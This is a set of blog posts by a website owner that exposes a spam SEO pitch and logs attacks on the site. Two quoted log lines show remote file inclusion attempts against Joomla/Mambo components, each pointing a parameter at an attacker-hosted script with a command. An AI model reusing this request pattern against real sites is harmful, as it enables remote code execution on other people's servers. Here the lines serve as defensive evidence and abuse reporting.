A customer of mine recently received the following spam…

Amazingly, considering that they promise worldwide search engine optimization, Dr. Marc Schneider and his company Global Vibration Inc., can only be found as being mentioned on sites relating to spamming.

I am Dr. Marc Schneider and I work for Global Vibration Inc. in Washington DC ( Tel: 1 202-787-3989 ) - I would like to speak with the person in charge of your international clientele. Who is my contact? Who should I speak to??

In fact, after visiting http://www.myclients.web.site.co.uk, I have noticed that your website cannot be found on foreign search engines (I tested it on Hispanic search engines, German search engines, Asian search engines, etc.) Our company is specialized in multilingual search engine promotions in 28 languages . From the Japanese Google to the German Yahoo, from the AOL in Spanish to the MSN in Chinese, we can show you how to develop a true international online presence by promoting your website on foreign search engines.

Let us show you how to develop a presence on the multilingual web without having to translate your website: It is not necessary to translate your website in order to submit to foreign search engines, however, you need to have at least 1 page in Japanese optimized with Japanese keywords and meta tags in order to submit to Japanese search engines, at least 1 page in Spanish optimized with Spanish keywords in order to submit to Hispanic search engines and so on…

I strongly suggest that you watch our online presentation which will explains clearly how to get top rankings on foreign search engines with only 1 entry page per language (click on the following link or copy-paste it into your web browser): http://www.mplw.net/demo

From the Japanese Google to the German Yahoo, from the AOL in Spanish to the MSN in Chinese, get users to find your website when searching with YOUR KEYWORDS in their Native language.

Please call me at 1 (202)-787-3989 or email me and let’s work on giving your website the true international exposure which it deserves to have with foreign native online users!!

Regards,

Marc Schneider, Ph.D.
Marcs@mplw.net
_____________________

GLOBAL VIBRATION INC.
1250 Connecticut Ave N.W. Suite 200
Washington, DC 20036 USA
TEL:1 (202)-787-3989 - FAX: 1 (202)-318-4779
http://www.mplw.net :
Multilingual Search Engine Promotion Services since 1999.

They don’t seem to have a presence at all on Japanese google.

They claim to have been doing Multilingual Search Engine Promotion Services (SEO) since 1999, but a whois query of their domain mplw.net shows a creation date of 04 Aug 2007 16:13:29

Many other companies are receiving the same spam for example, see http://www.tmcowners.com

For such a multi-nationally aware company, sending spam to the UK, Global Vibration Inc. haven’t even been capable of putting their own phone number in the standard international format, presumably because they are not aware that anyone outside the USA has to dial in international number to reach them.

Associated with their domains are the following administrative email addresses

• urls@mseo.com
• mauispirit@gmail.com

I saw a couple of entries in the logs that looked like similar attempts to deface the site as seen in the article, script kiddies 2, however they seem either different, or more sophisticated. More »

After the mention in Script Kiddies 2 and being given a report that one of their account holders has put up a site defacing script, the free hosting site phpnet.us cancelled the damaging account.
It is a real pity that so many of their competitors do not act equally responsibly.

The logs showed up another attempted exploit, very similar to the one in New Hack Attempt

88.242.239.182 - - [27/May/2007:18:40:29 +0100] “GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0″ 403 327 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”


phpnet.us which provides the hosting does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that there service is being used by script kiddies.

The originating IP address belongs to the the familiar TurkTelekom, who seem to have become the home of some script kiddies.

inetnum: 88.242.64.0 - 88.242.255.255
netname: TurkTelekom
descr: TT ADSL-alcatel dynamic_aci

As usual, their abuse account bounced a the complaint.
It looks like another of their IP ranges will have to be blocked.

The following hack attempt appeared in the dragonthoughts logs yesterday.

88.233.150.109 - - [21/May/2007:21:39:02 +0100] “GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&list=1&cmd=id HTTP/1.0″ 403 283 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”

presumably it is a script kiddy, who has no idea how old the exploit is, but these reports of a year ago will provide an idea:

• http://osvdb.org/displayvuln.php?osvdb_id=27010
• http://xforce.iss.net/xforce/xfdb/27906

The listed abuse reporting email address bounced my complaint, for the originators IP range 88.233.0.0 - 88.233.255.255

netname: TurkTelekom
descr: TT ADSL-alcatel_gay

So, all of its IP ranges will have their access blocked.

As will the range 212.175.205.0- 212.175.205.255 which is hosting genchackers.net

The hacker script that is hosted at genchackers.net was ripped off from http://georgiaeliteallstars.com although they seem to have taken the script down now.

As it stands, the script can’t work for the kiddie that downloaded it, but I don’t think it is appropriate or ethical to explain how to fix it!

Over the last couple of days, the blog spammers have been trying to comment on the Japanese interest rate changes.

Various IP addresses are being used, which suggests a botnet, but as they are all trying to push links on the same page to the same sexually explicit, and probably illegal sites, it is fair to assume that they are linked.

The IP addresses of these attacks so far are:

24.199.119.150
24.22.218.231
24.230.136.95
87.245.109.208
75.27.187.192
88.6.79.188
172.192.85.173
200.185.242.156
201.13.92.43
216.76.227.127

Additional compromised IP addresses which try to add their spam to the Japanese interest rate article for 24^th April 2007

24.14.156.99
69.1.40.80
71.63.151.152
75.57.135.91
75.52.255.169

A blog spammer, has recently been trying to leave its rubbish on this site. Interstingly, each time it was denied, it tries again pretending to be a different user agent, without any repeats.

Access from the same IP address (64.28.178.66) repeatedly tries to access random blog pages, some of which don’t even exist.

Here’s an extract from the log…

64.28.178.66 - - [10/Oct/2006:20:17:50 +0100] “GET /blog/?p=13 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; SV1; .NET CLR 1.1.4322)”
64.28.178.66 - - [10/Oct/2006:20:37:34 +0100] “GET /blog/?p=21 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1″
64.28.178.66 - - [10/Oct/2006:21:52:26 +0100] “GET /blog/?p=6 HTTP/1.1″ 403 279 “-” “EVE-minibrowser/”
64.28.178.66 - - [10/Oct/2006:22:16:38 +0100] “GET /blog/?p=14 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5″
64.28.178.66 - - [10/Oct/2006:22:22:55 +0100] “GET /blog/?p=11 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)”
64.28.178.66 - - [10/Oct/2006:22:53:52 +0100] “GET /blog/?p=34 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)”
64.28.178.66 - - [10/Oct/2006:22:54:48 +0100] “GET /blog/?p=22 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Maxthon; iOpus-I-M; SV1; .NET CLR 1.1.4322)”
64.28.178.66 - - [11/Oct/2006:00:34:53 +0100] “GET /blog/index.php?p=30 HTTP/1.1″ 403 288 “-” “OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer”
64.28.178.66 - - [11/Oct/2006:01:29:30 +0100] “GET /blog/index.php?p=30 HTTP/1.1″ 403 288 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; [eburo v1.3]; .NET CLR 1.1.4322)”
64.28.178.66 - - [11/Oct/2006:01:31:14 +0100] “GET /blog/?p=10 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)”
64.28.178.66 - - [11/Oct/2006:03:09:43 +0100] “GET /blog/?p=18 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (firatnyvr; MSIE 6.0; ; SV1)”
64.28.178.66 - - [11/Oct/2006:04:50:30 +0100] “GET /blog/?p=14 HTTP/1.1″ 403 279 “-” “OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer”
64.28.178.66 - - [11/Oct/2006:12:01:03 +0100] “GET /blog/?p=13 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041116 Firefox/1.0 (Ubuntu) (Ubuntu package 1.0-2ubuntu3)”
64.28.178.66 - - [11/Oct/2006:12:18:56 +0100] “GET /blog/?p=21 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (cOsmO&SoNnE; MSIE 6.0; Windows XP)”
64.28.178.66 - - [11/Oct/2006:13:33:53 +0100] “GET /blog/?p=6 HTTP/1.1″ 403 279 “-” “LinkWalker”
64.28.178.66 - - [11/Oct/2006:13:57:28 +0100] “GET /blog/?p=14 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)”
64.28.178.66 - - [11/Oct/2006:14:04:21 +0100] “GET /blog/?p=11 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firechicken/1.0″
64.28.178.66 - - [11/Oct/2006:16:39:33 +0100] “GET /blog/?p=2 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1″

Does anyone know anything about this outfit?